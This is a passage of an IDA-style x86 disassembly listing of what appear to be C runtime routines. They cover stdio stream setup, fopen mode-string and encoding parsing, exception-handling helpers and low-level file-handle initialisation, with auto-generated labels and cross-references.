xor eax, eax
retn
sub_408062 endp
; =============== S U B R O U T I N E =======================================
sub_408084 proc near ; CODE XREF: sub_4067D6+76�p
; sub_4067D6+82�p ...
mov eax, offset off_423950
retn
sub_408084 endp
; =============== S U B R O U T I N E =======================================
sub_40808A proc near ; DATA XREF: .kSjx934:0041D2C8�o
mov eax, ds:dword_434DC0
test eax, eax
push esi
push 14h
pop esi
jnz short loc_40809E
mov eax, 200h
jmp short loc_4080A4
; ---------------------------------------------------------------------------
loc_40809E: ; CODE XREF: sub_40808A+B�j
cmp eax, esi
jge short loc_4080A9
mov eax, esi
loc_4080A4: ; CODE XREF: sub_40808A+12�j
mov ds:dword_434DC0, eax
loc_4080A9: ; CODE XREF: sub_40808A+16�j
push 4
push eax
call sub_40777A
test eax, eax
pop ecx
pop ecx
mov ds:dword_433DA0, eax
jnz short loc_4080DA
push 4
push esi
mov ds:dword_434DC0, esi
call sub_40777A
test eax, eax
pop ecx
pop ecx
mov ds:dword_433DA0, eax
jnz short loc_4080DA
push 1Ah
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4080DA: ; CODE XREF: sub_40808A+30�j
; sub_40808A+49�j
xor edx, edx
mov ecx, offset off_423950
jmp short loc_4080E8
; ---------------------------------------------------------------------------
loc_4080E3: ; CODE XREF: sub_40808A+6D�j
mov eax, ds:dword_433DA0
loc_4080E8: ; CODE XREF: sub_40808A+57�j
mov [edx+eax], ecx
add ecx, 20h
add edx, 4
cmp ecx, offset dword_423BD0
jl short loc_4080E3
push 0FFFFFFFEh
pop esi
xor edx, edx
mov ecx, offset dword_423960
push edi
loc_408104: ; CODE XREF: sub_40808A+AA�j
mov edi, edx
and edi, 1Fh
imul edi, 28h
mov eax, edx
sar eax, 5
mov eax, ds:dword_433CA0[eax*4]
mov eax, [edi+eax]
cmp eax, 0FFFFFFFFh
jz short loc_408128
cmp eax, esi
jz short loc_408128
test eax, eax
jnz short loc_40812A
loc_408128: ; CODE XREF: sub_40808A+94�j
; sub_40808A+98�j
mov [ecx], esi
loc_40812A: ; CODE XREF: sub_40808A+9C�j
add ecx, 20h
inc edx
cmp ecx, offset dword_4239C0
jl short loc_408104
pop edi
xor eax, eax
pop esi
retn
sub_40808A endp
; =============== S U B R O U T I N E =======================================
sub_40813B proc near ; DATA XREF: .kSjx934:0041D2E4�o
call sub_408D58
cmp ds:byte_425FB0, 0
jz short loc_40814E
call sub_40DFD3
loc_40814E: ; CODE XREF: sub_40813B+C�j
push ds:dword_433DA0
call sub_403603
pop ecx
retn
sub_40813B endp
; =============== S U B R O U T I N E =======================================
sub_40815B proc near ; CODE XREF: sub_403207+4F�p
; sub_4034C4+50�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, offset off_423950
cmp eax, ecx
jb short loc_40817F
cmp eax, offset dword_423BB0
ja short loc_40817F
sub eax, ecx
sar eax, 5
add eax, 10h
push eax
call sub_4059F7
pop ecx
retn
; ---------------------------------------------------------------------------
loc_40817F: ; CODE XREF: sub_40815B+B�j
; sub_40815B+12�j
add eax, 20h
push eax
call ds:dword_41D168
retn
sub_40815B endp
; =============== S U B R O U T I N E =======================================
sub_40818A proc near ; CODE XREF: sub_4084A1+66�p
; sub_408C7E+46�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp eax, 14h
jge short loc_40819E
add eax, 10h
push eax
call sub_4059F7
pop ecx
retn
; ---------------------------------------------------------------------------
loc_40819E: ; CODE XREF: sub_40818A+7�j
mov eax, [esp+arg_4]
add eax, 20h
push eax
call ds:dword_41D168
retn
sub_40818A endp
; =============== S U B R O U T I N E =======================================
sub_4081AD proc near ; CODE XREF: sub_4031EA+3�p
; sub_40334C+3�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, offset off_423950
cmp eax, ecx
jb short loc_4081D1
cmp eax, offset dword_423BB0
ja short loc_4081D1
sub eax, ecx
sar eax, 5
add eax, 10h
push eax
call sub_40591F
pop ecx
retn
; ---------------------------------------------------------------------------
loc_4081D1: ; CODE XREF: sub_4081AD+B�j
; sub_4081AD+12�j
add eax, 20h
push eax
call ds:dword_41D16C
retn
sub_4081AD endp
; =============== S U B R O U T I N E =======================================
sub_4081DC proc near ; CODE XREF: sub_4084A1+7D�p
; sub_408D20+9�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp eax, 14h
jge short loc_4081F0
add eax, 10h
push eax
call sub_40591F
pop ecx
retn
; ---------------------------------------------------------------------------
loc_4081F0: ; CODE XREF: sub_4081DC+7�j
mov eax, [esp+arg_4]
add eax, 20h
push eax
call ds:dword_41D16C
retn
sub_4081DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4081FF proc near ; CODE XREF: sub_403130+9A�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, ds:dword_426484
push ebx
xor ebx, ebx
push esi
mov esi, [ebp+arg_4]
mov [ebp+var_4], eax
mov [ebp+var_C], ebx
mov [ebp+var_8], ebx
mov [ebp+var_10], ebx
jmp short loc_408220
; ---------------------------------------------------------------------------
loc_40821F: ; CODE XREF: sub_4081FF+24�j
inc esi
loc_408220: ; CODE XREF: sub_4081FF+1E�j
cmp byte ptr [esi], 20h
jz short loc_40821F
mov al, [esi]
cmp al, 61h
jz short loc_408264
cmp al, 72h
jz short loc_40825B
cmp al, 77h
jz short loc_408252
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
xor eax, eax
jmp loc_40849D
; ---------------------------------------------------------------------------
loc_408252: ; CODE XREF: sub_4081FF+32�j
mov [ebp+arg_4], 301h
jmp short loc_40826B
; ---------------------------------------------------------------------------
loc_40825B: ; CODE XREF: sub_4081FF+2E�j
or [ebp+var_4], 1
mov [ebp+arg_4], ebx
jmp short loc_40826F
; ---------------------------------------------------------------------------
loc_408264: ; CODE XREF: sub_4081FF+2A�j
mov [ebp+arg_4], 109h
loc_40826B: ; CODE XREF: sub_4081FF+5A�j
or [ebp+var_4], 2
loc_40826F: ; CODE XREF: sub_4081FF+63�j
xor ecx, ecx
inc ecx
inc esi
mov al, [esi]
cmp al, bl
push edi
jz loc_408437
mov edx, 80h
mov edi, 4000h
loc_408288: ; CODE XREF: sub_4081FF+1B6�j
cmp ecx, ebx
jz loc_4083BB
movsx eax, al
cmp eax, 53h
jg loc_40833E
jz loc_40832C
sub eax, 20h
jz loc_4083B0
sub eax, 0Bh
jz short loc_408306
dec eax
jz short loc_4082FA
sub eax, 18h
jz short loc_4082E7
sub eax, 0Ah
jz short loc_4082DF
sub eax, 4
jnz loc_408440
cmp [ebp+var_8], ebx
jnz loc_4083A5
or [ebp+arg_4], 10h
mov [ebp+var_8], 1
jmp loc_4083B0
; ---------------------------------------------------------------------------
loc_4082DF: ; CODE XREF: sub_4081FF+BC�j
or [ebp+arg_4], edx
jmp loc_4083B0
; ---------------------------------------------------------------------------
loc_4082E7: ; CODE XREF: sub_4081FF+B7�j
test byte ptr [ebp+arg_4], 40h
jnz loc_4083A5
or [ebp+arg_4], 40h
jmp loc_4083B0
; ---------------------------------------------------------------------------
loc_4082FA: ; CODE XREF: sub_4081FF+B2�j
mov [ebp+var_10], 1
jmp loc_4083A5
; ---------------------------------------------------------------------------
loc_408306: ; CODE XREF: sub_4081FF+AF�j
test byte ptr [ebp+arg_4], 2
jnz loc_4083A5
mov eax, [ebp+arg_4]
and eax, 0FFFFFFFEh
or eax, 2
mov [ebp+arg_4], eax
mov eax, [ebp+var_4]
and eax, 0FFFFFFFCh
or eax, edx
mov [ebp+var_4], eax
jmp loc_4083B0
; ---------------------------------------------------------------------------
loc_40832C: ; CODE XREF: sub_4081FF+9D�j
cmp [ebp+var_8], ebx
jnz short loc_4083A5
or [ebp+arg_4], 20h
mov [ebp+var_8], 1
jmp short loc_4083B0
; ---------------------------------------------------------------------------
loc_40833E: ; CODE XREF: sub_4081FF+97�j
sub eax, 54h
jz short loc_40839D
sub eax, 0Eh
jz short loc_40838C
dec eax
jz short loc_40837B
sub eax, 0Bh
jz short loc_408366
sub eax, 6
jnz loc_408440
test word ptr [ebp+arg_4], 0C000h
jnz short loc_4083A5
or [ebp+arg_4], edi
jmp short loc_4083B0
; ---------------------------------------------------------------------------
loc_408366: ; CODE XREF: sub_4081FF+14F�j
cmp [ebp+var_C], ebx
jnz short loc_4083A5
and [ebp+var_4], 0FFFFBFFFh
mov [ebp+var_C], 1
jmp short loc_4083B0
; ---------------------------------------------------------------------------
loc_40837B: ; CODE XREF: sub_4081FF+14A�j
cmp [ebp+var_C], ebx
jnz short loc_4083A5
or [ebp+var_4], edi
mov [ebp+var_C], 1
jmp short loc_4083B0
; ---------------------------------------------------------------------------
loc_40838C: ; CODE XREF: sub_4081FF+147�j
test word ptr [ebp+arg_4], 0C000h
jnz short loc_4083A5
or [ebp+arg_4], 8000h
jmp short loc_4083B0
; ---------------------------------------------------------------------------
loc_40839D: ; CODE XREF: sub_4081FF+142�j
test word ptr [ebp+arg_4], 1000h
jz short loc_4083A9
loc_4083A5: ; CODE XREF: sub_4081FF+CA�j
; sub_4081FF+EC�j ...
xor ecx, ecx
jmp short loc_4083B0
; ---------------------------------------------------------------------------
loc_4083A9: ; CODE XREF: sub_4081FF+1A4�j
or [ebp+arg_4], 1000h
loc_4083B0: ; CODE XREF: sub_4081FF+A6�j
; sub_4081FF+DB�j ...
inc esi
mov al, [esi]
cmp al, bl
jnz loc_408288
loc_4083BB: ; CODE XREF: sub_4081FF+8B�j
cmp [ebp+var_10], ebx
jz short loc_408437
jmp short loc_4083C3
; ---------------------------------------------------------------------------
loc_4083C2: ; CODE XREF: sub_4081FF+1C7�j
inc esi
loc_4083C3: ; CODE XREF: sub_4081FF+1C1�j
cmp byte ptr [esi], 20h
jz short loc_4083C2
push 4
push esi
push offset aCcs ; "ccs="
call sub_40EB30
add esp, 0Ch
test eax, eax
jnz short loc_408440
add esi, 4
push offset aUtf8 ; "UTF-8"
push esi
call sub_40E9B4
test eax, eax
pop ecx
pop ecx
jnz short loc_4083FC
add esi, 5
or [ebp+arg_4], 40000h
jmp short loc_408437
; ---------------------------------------------------------------------------
loc_4083FC: ; CODE XREF: sub_4081FF+1EF�j
push offset aUtf16le ; "UTF-16LE"
push esi
call sub_40E9B4
test eax, eax
pop ecx
pop ecx
jnz short loc_408419
add esi, 8
or [ebp+arg_4], 20000h
jmp short loc_408437
; ---------------------------------------------------------------------------
loc_408419: ; CODE XREF: sub_4081FF+20C�j
push offset aUnicode ; "UNICODE"
push esi
call sub_40E9B4
test eax, eax
pop ecx
pop ecx
jnz short loc_408440
add esi, 7
or [ebp+arg_4], 10000h
jmp short loc_408437
; ---------------------------------------------------------------------------
loc_408436: ; CODE XREF: sub_4081FF+23B�j
inc esi
loc_408437: ; CODE XREF: sub_4081FF+79�j
; sub_4081FF+1BF�j ...
cmp byte ptr [esi], 20h
jz short loc_408436
cmp [esi], bl
jz short loc_40845A
loc_408440: ; CODE XREF: sub_4081FF+C1�j
; sub_4081FF+154�j ...
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
jmp short loc_408478
; ---------------------------------------------------------------------------
loc_40845A: ; CODE XREF: sub_4081FF+23F�j
push 180h
push [ebp+arg_8]
lea eax, [ebp+var_10]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
call sub_40E77C
add esp, 14h
test eax, eax
jz short loc_40847C
loc_408478: ; CODE XREF: sub_4081FF+259�j
xor eax, eax
jmp short loc_40849C
; ---------------------------------------------------------------------------
loc_40847C: ; CODE XREF: sub_4081FF+277�j
mov eax, [ebp+arg_C]
inc ds:dword_425FC8
mov ecx, [ebp+var_4]
mov [eax+0Ch], ecx
mov ecx, [ebp+var_10]
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], ebx
mov [eax+1Ch], ebx
mov [eax+10h], ecx
loc_40849C: ; CODE XREF: sub_4081FF+27B�j
pop edi
loc_40849D: ; CODE XREF: sub_4081FF+4E�j
pop esi
pop ebx
leave
retn
sub_4081FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4084A1 proc near ; CODE XREF: sub_403130+54�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 10h
push offset dword_421538
call __SEH_prolog4
xor ebx, ebx
xor edi, edi
mov [ebp+var_1C], edi
push 1
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], ebx
xor esi, esi
loc_4084C1: ; CODE XREF: sub_4084A1+85�j
mov [ebp+var_20], esi
cmp esi, ds:dword_434DC0
jge loc_408591
mov eax, ds:dword_433DA0
lea eax, [eax+esi*4]
cmp [eax], ebx
jz short loc_40852C
mov eax, [eax]
test byte ptr [eax+0Ch], 83h
jnz short loc_408525
lea eax, [esi-3]
cmp eax, 10h
ja short loc_4084FE
lea eax, [esi+10h]
push eax
call sub_405934
pop ecx
test eax, eax
jz loc_408591
loc_4084FE: ; CODE XREF: sub_4084A1+49�j
mov eax, ds:dword_433DA0
push dword ptr [eax+esi*4]
push esi
call sub_40818A
pop ecx
pop ecx
mov eax, ds:dword_433DA0
mov eax, [eax+esi*4]
test byte ptr [eax+0Ch], 83h
jz short loc_408528
push eax
push esi
call sub_4081DC
pop ecx
pop ecx
loc_408525: ; CODE XREF: sub_4084A1+41�j
inc esi
jmp short loc_4084C1
; ---------------------------------------------------------------------------
loc_408528: ; CODE XREF: sub_4084A1+79�j
mov edi, eax
jmp short loc_40858E
; ---------------------------------------------------------------------------
loc_40852C: ; CODE XREF: sub_4084A1+39�j
shl esi, 2
push 38h
call sub_40773A
pop ecx
mov ecx, ds:dword_433DA0
mov [esi+ecx], eax
mov eax, ds:dword_433DA0
add eax, esi
cmp [eax], ebx
jz short loc_408591
push 0FA0h
mov eax, [eax]
add eax, 20h
push eax
call sub_40CB14
pop ecx
pop ecx
test eax, eax
mov eax, ds:dword_433DA0
jnz short loc_408579
push dword ptr [esi+eax]
call sub_403603
pop ecx
mov eax, ds:dword_433DA0
mov [esi+eax], ebx
jmp short loc_408591
; ---------------------------------------------------------------------------
loc_408579: ; CODE XREF: sub_4084A1+C3�j
mov eax, [esi+eax]
add eax, 20h
push eax
call ds:dword_41D168
mov eax, ds:dword_433DA0
mov edi, [esi+eax]
loc_40858E: ; CODE XREF: sub_4084A1+89�j
mov [ebp+var_1C], edi
loc_408591: ; CODE XREF: sub_4084A1+29�j
; sub_4084A1+57�j ...
cmp edi, ebx
jz short loc_4085A7
mov [edi+4], ebx
mov [edi+0Ch], ebx
mov [edi+8], ebx
mov [edi], ebx
mov [edi+1Ch], ebx
or dword ptr [edi+10h], 0FFFFFFFFh
loc_4085A7: ; CODE XREF: sub_4084A1+F2�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_4085BE
mov eax, edi
call __SEH_epilog4
retn
sub_4084A1 endp
; =============== S U B R O U T I N E =======================================
sub_4085BB proc near ; DATA XREF: .kSjx934:00421550�o
mov edi, [ebp-1Ch]
sub_4085BB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4085BE proc near ; CODE XREF: sub_4084A1+10D�p
push 1
call sub_40591F
pop ecx
retn
sub_4085BE endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4085C8 proc near ; CODE XREF: sub_403130+8A�p
; sub_4085C8+BD�p ...
var_20 = dword ptr -20h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
push edi
mov edx, [esp+0Ch+arg_0]
mov eax, [esp+0Ch+arg_4]
mov ecx, [esp+0Ch+arg_8]
push ebp
push edx
push eax
push ecx
push ecx
push offset loc_408658
push large dword ptr fs:0
mov eax, ds:dword_423064
xor eax, esp
mov [esp+28h+var_20], eax
mov large fs:0, esp
loc_4085FA: ; CODE XREF: sub_4085C8+64�j
; sub_4085C8+80�j
mov eax, [esp+28h+arg_4]
mov ebx, [eax+8]
mov ecx, [esp+28h+arg_0]
xor ebx, [ecx]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFEh
jz short loc_40864A
mov edx, [esp+28h+arg_8]
cmp edx, 0FFFFFFFEh
jz short loc_40861C
cmp esi, edx
jbe short loc_40864A
loc_40861C: ; CODE XREF: sub_4085C8+4E�j
lea esi, [esi+esi*2]
lea ebx, [ebx+esi*4+10h]
mov ecx, [ebx]
mov [eax+0Ch], ecx
cmp dword ptr [ebx+4], 0
jnz short loc_4085FA
push 101h
mov eax, [ebx+8]
call sub_40EC5D
mov ecx, 1
mov eax, [ebx+8]
call sub_40EC7C
jmp short loc_4085FA
; ---------------------------------------------------------------------------
loc_40864A: ; CODE XREF: sub_4085C8+45�j
; sub_4085C8+52�j
pop large dword ptr fs:0
add esp, 18h
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_408658: ; DATA XREF: sub_4085C8+14�o
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_40869D
mov eax, [esp+arg_4]
mov ecx, [eax+8]
xor ecx, eax
call sub_402710
push ebp
mov ebp, [eax+18h]
push dword ptr [eax+0Ch]
push dword ptr [eax+10h]
push dword ptr [eax+14h]
call sub_4085C8
add esp, 0Ch
pop ebp
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_40869D: ; CODE XREF: sub_4085C8+A0�j
retn
sub_4085C8 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
push dword ptr [ecx+1Ch]
push dword ptr [ecx+18h]
push dword ptr [ecx+28h]
call sub_4085C8
add esp, 0Ch
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_4086BA proc near ; CODE XREF: sub_406640+89�p
push ebp
push esi
push edi
push ebx
mov ebp, edx
xor eax, eax
xor ebx, ebx
xor edx, edx
xor esi, esi
xor edi, edi
call ecx
pop ebx
pop edi
pop esi
pop ebp
retn
sub_4086BA endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_406640
loc_4086D1: ; CODE XREF: sub_406640+170�j
mov ebp, edx
mov esi, ecx
mov eax, ecx
push 1
call sub_40EC5D
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
xor edi, edi
jmp esi
; END OF FUNCTION CHUNK FOR sub_406640
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4086EA proc near ; CODE XREF: sub_406640+11F�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
push 0
push 0
push offset loc_4086FF
push ecx
call sub_413976
loc_4086FF: ; DATA XREF: sub_4086EA+A�o
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4086EA endp
; =============== S U B R O U T I N E =======================================
sub_408704 proc near ; CODE XREF: sub_406640+137�p
; sub_406640+18C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebp
mov ebp, [esp+4+arg_0]
push edx
push ecx
push [esp+0Ch+arg_4]
call sub_4085C8
add esp, 0Ch
pop ebp
retn 8
sub_408704 endp
; =============== S U B R O U T I N E =======================================
sub_40871B proc near ; CODE XREF: sub_403207+10E�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_408A20
push eax
call sub_40D540
test eax, eax
pop ecx
pop ecx
jz short loc_4087AD
call sub_408084
add eax, 20h
cmp esi, eax
jnz short loc_408742
xor eax, eax
jmp short loc_408751
; ---------------------------------------------------------------------------
loc_408742: ; CODE XREF: sub_40871B+21�j
call sub_408084
add eax, 40h
cmp esi, eax
jnz short loc_4087AD
xor eax, eax
inc eax
loc_408751: ; CODE XREF: sub_40871B+25�j
inc ds:dword_425FC8
test word ptr [esi+0Ch], 10Ch
jnz short loc_4087AD
push ebx
push edi
lea edi, ds:425FCCh[eax*4]
cmp dword ptr [edi], 0
mov ebx, 1000h
jnz short loc_408792
push ebx
call sub_40773A
test eax, eax
pop ecx
mov [edi], eax
jnz short loc_408792
lea eax, [esi+14h]
push 2
mov [esi+8], eax
mov [esi], eax
pop eax
mov [esi+18h], eax
mov [esi+4], eax
jmp short loc_40879F
; ---------------------------------------------------------------------------
loc_408792: ; CODE XREF: sub_40871B+55�j
; sub_40871B+62�j
mov edi, [edi]
mov [esi+8], edi
mov [esi], edi
mov [esi+18h], ebx
mov [esi+4], ebx
loc_40879F: ; CODE XREF: sub_40871B+75�j
or dword ptr [esi+0Ch], 1102h
pop edi
xor eax, eax
pop ebx
inc eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4087AD: ; CODE XREF: sub_40871B+15�j
; sub_40871B+31�j ...
xor eax, eax
pop esi
retn
sub_40871B endp
; =============== S U B R O U T I N E =======================================
sub_4087B1 proc near ; CODE XREF: sub_403207+128�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
jz short locret_4087DF
push esi
mov esi, [esp+4+arg_4]
test word ptr [esi+0Ch], 1000h
jz short loc_4087DE
push esi
call sub_408BDA
and dword ptr [esi+0Ch], 0FFFFEEFFh
and dword ptr [esi+18h], 0
and dword ptr [esi], 0
and dword ptr [esi+8], 0
pop ecx
loc_4087DE: ; CODE XREF: sub_4087B1+12�j
pop esi
locret_4087DF: ; CODE XREF: sub_4087B1+5�j
retn
sub_4087B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4087E0 proc near ; CODE XREF: .kSjx934:00404034�p
var_64 = byte ptr -64h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 54h
push offset dword_421558
call __SEH_prolog4
xor edi, edi
mov [ebp+ms_exc.disabled], edi
lea eax, [ebp+var_64]
push eax
call ds:dword_41D1A8
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
push 28h
push 20h
pop esi
push esi
call sub_40777A
pop ecx
pop ecx
cmp eax, edi
jz loc_408A17
mov ds:dword_433CA0, eax
mov ds:dword_433C84, esi
lea ecx, [eax+500h]
jmp short loc_408853
; ---------------------------------------------------------------------------
loc_40882A: ; CODE XREF: sub_4087E0+75�j
mov byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov [eax+8], edi
mov byte ptr [eax+24h], 0
mov byte ptr [eax+25h], 0Ah
mov byte ptr [eax+26h], 0Ah
add eax, 28h
mov ecx, ds:dword_433CA0
add ecx, 500h
loc_408853: ; CODE XREF: sub_4087E0+48�j
cmp eax, ecx
jb short loc_40882A
cmp [ebp+var_32], di
jz loc_40895E
mov eax, [ebp+var_30]
cmp eax, edi
jz loc_40895E
mov edi, [eax]
lea ebx, [eax+4]
lea eax, [ebx+edi]
mov [ebp+var_1C], eax
mov eax, 800h
cmp edi, eax
jl short loc_408882
mov edi, eax
loc_408882: ; CODE XREF: sub_4087E0+9E�j
xor esi, esi
inc esi
jmp short loc_4088D9
; ---------------------------------------------------------------------------
loc_408887: ; CODE XREF: sub_4087E0+FF�j
push 28h
push 20h
call sub_40777A
pop ecx
pop ecx
test eax, eax
jz short loc_4088E3
lea ecx, ds:433CA0h[esi*4]
mov [ecx], eax
add ds:dword_433C84, 20h
lea edx, [eax+500h]
jmp short loc_4088D4
; ---------------------------------------------------------------------------
loc_4088AE: ; CODE XREF: sub_4087E0+F6�j
mov byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
and dword ptr [eax+8], 0
and byte ptr [eax+24h], 80h
mov byte ptr [eax+25h], 0Ah
mov byte ptr [eax+26h], 0Ah
add eax, 28h
mov edx, [ecx]
add edx, 500h
loc_4088D4: ; CODE XREF: sub_4087E0+CC�j
cmp eax, edx
jb short loc_4088AE
inc esi
loc_4088D9: ; CODE XREF: sub_4087E0+A5�j
cmp ds:dword_433C84, edi
jl short loc_408887
jmp short loc_4088E9
; ---------------------------------------------------------------------------
loc_4088E3: ; CODE XREF: sub_4087E0+B4�j
mov edi, ds:dword_433C84
loc_4088E9: ; CODE XREF: sub_4087E0+101�j
and [ebp+var_20], 0
test edi, edi
jle short loc_40895E
loc_4088F1: ; CODE XREF: sub_4087E0+17C�j
mov eax, [ebp+var_1C]
mov ecx, [eax]
cmp ecx, 0FFFFFFFFh
jz short loc_408951
cmp ecx, 0FFFFFFFEh
jz short loc_408951
mov al, [ebx]
test al, 1
jz short loc_408951
test al, 8
jnz short loc_408915
push ecx
call ds:dword_41D148
test eax, eax
jz short loc_408951
loc_408915: ; CODE XREF: sub_4087E0+128�j
mov esi, [ebp+var_20]
mov eax, esi
sar eax, 5
and esi, 1Fh
imul esi, 28h
add esi, ds:dword_433CA0[eax*4]
mov eax, [ebp+var_1C]
mov eax, [eax]
mov [esi], eax
mov al, [ebx]
mov [esi+4], al
push 0FA0h
lea eax, [esi+0Ch]
push eax
call sub_40CB14
pop ecx
pop ecx
test eax, eax
jz loc_408A17
inc dword ptr [esi+8]
loc_408951: ; CODE XREF: sub_4087E0+119�j
; sub_4087E0+11E�j ...
inc [ebp+var_20]
inc ebx
add [ebp+var_1C], 4
cmp [ebp+var_20], edi
jl short loc_4088F1
loc_40895E: ; CODE XREF: sub_4087E0+7B�j
; sub_4087E0+86�j ...
xor ebx, ebx
loc_408960: ; CODE XREF: sub_4087E0+213�j
mov esi, ebx
imul esi, 28h
add esi, ds:dword_433CA0
mov eax, [esi]
cmp eax, 0FFFFFFFFh
jz short loc_40897D
cmp eax, 0FFFFFFFEh
jz short loc_40897D
or byte ptr [esi+4], 80h
jmp short loc_4089EF
; ---------------------------------------------------------------------------
loc_40897D: ; CODE XREF: sub_4087E0+190�j
; sub_4087E0+195�j
mov byte ptr [esi+4], 81h
test ebx, ebx
jnz short loc_40898A
push 0FFFFFFF6h
pop eax
jmp short loc_408994
; ---------------------------------------------------------------------------
loc_40898A: ; CODE XREF: sub_4087E0+1A3�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_408994: ; CODE XREF: sub_4087E0+1A8�j
push eax
call ds:dword_41D14C
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_4089E5
test edi, edi
jz short loc_4089E5
push edi
call ds:dword_41D148
test eax, eax
jz short loc_4089E5
mov [esi], edi
and eax, 0FFh
cmp eax, 2
jnz short loc_4089C3
or byte ptr [esi+4], 40h
jmp short loc_4089CC
; ---------------------------------------------------------------------------
loc_4089C3: ; CODE XREF: sub_4087E0+1DB�j
cmp eax, 3
jnz short loc_4089CC
or byte ptr [esi+4], 8
loc_4089CC: ; CODE XREF: sub_4087E0+1E1�j
; sub_4087E0+1E6�j
push 0FA0h
lea eax, [esi+0Ch]
push eax
call sub_40CB14
pop ecx
pop ecx
test eax, eax
jz short loc_408A17
inc dword ptr [esi+8]
jmp short loc_4089EF
; ---------------------------------------------------------------------------
loc_4089E5: ; CODE XREF: sub_4087E0+1C0�j
; sub_4087E0+1C4�j ...
or byte ptr [esi+4], 40h
mov dword ptr [esi], 0FFFFFFFEh
loc_4089EF: ; CODE XREF: sub_4087E0+19B�j
; sub_4087E0+203�j
inc ebx
cmp ebx, 3
jl loc_408960
push ds:dword_433C84
call ds:dword_41D150
xor eax, eax
jmp short loc_408A1A
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
loc_408A17: ; CODE XREF: sub_4087E0+31�j
; sub_4087E0+168�j ...
or eax, 0FFFFFFFFh
loc_408A1A: ; CODE XREF: sub_4087E0+227�j
call __SEH_epilog4
retn
sub_4087E0 endp
; =============== S U B R O U T I N E =======================================
sub_408A20 proc near ; CODE XREF: sub_403207+63�p
; sub_403207+6F�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
xor esi, esi
cmp eax, esi
jnz short loc_408A48
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_408A48: ; CODE XREF: sub_408A20+9�j
mov eax, [eax+10h]
pop esi
retn
sub_408A20 endp
; =============== S U B R O U T I N E =======================================
sub_408A4D proc near ; CODE XREF: sub_408AE1+94�p
; sub_40E072+340�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
push esi
call sub_40ED7D
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_408AAC
cmp esi, 1
mov eax, ds:dword_433CA0
jnz short loc_408A6F
test byte ptr [eax+54h], 1
jnz short loc_408A7A
loc_408A6F: ; CODE XREF: sub_408A4D+1A�j
cmp esi, 2
jnz short loc_408A90
test byte ptr [eax+2Ch], 1
jz short loc_408A90
loc_408A7A: ; CODE XREF: sub_408A4D+20�j
push 2
call sub_40ED7D
push 1
mov edi, eax
call sub_40ED7D
cmp eax, edi
pop ecx
pop ecx
jz short loc_408AAC
loc_408A90: ; CODE XREF: sub_408A4D+25�j
; sub_408A4D+2B�j
push esi
call sub_40ED7D
pop ecx
push eax
call ds:dword_41D0DC
test eax, eax
jnz short loc_408AAC
call ds:dword_41D0F0
mov edi, eax
jmp short loc_408AAE
